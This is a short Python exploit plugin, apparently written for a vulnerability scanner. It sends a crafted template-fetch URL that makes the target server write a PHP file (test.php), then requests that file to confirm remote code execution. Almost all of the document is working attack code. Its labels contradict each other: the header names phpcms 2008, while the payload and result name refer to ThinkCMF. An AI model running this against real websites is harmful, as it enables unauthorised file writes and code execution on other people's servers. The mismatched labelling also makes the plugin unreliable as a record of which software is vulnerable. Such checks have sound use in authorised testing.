# Author:w8ay
# Name:phpcms 2008 rce
'''
referer: https://xz.aliyun.com/t/6626
description: 攻击者可利用此漏洞构造恶意的url，向服务器写入任意内容的文件，达到远程代码执行的目的。
'''
import HackRequests

def poc(arg, **kwargs):
    payload = r'''/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php var_dump(md5(123)); ?>')</php>'''
    hh = HackRequests.http(arg + payload)
    shell_url = arg + '/test.php'
    r = HackRequests.http(shell_url)
    if r.status_code == 200 and '202cb962ac59075b964b07152d234b70' in r.text():
        result = {
            "name": "thinkcmf_rce_getshell",  # 插件名称
            "content": "攻击者利用该漏洞，可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。",  # 插件返回内容详情，会造成什么后果。
            "url": shell_url,  # 漏洞存在url
            "log": hh.log,
            "tag": "rce"  # 漏洞标签
        }
        return result

if __name__ == "__main__":
    pass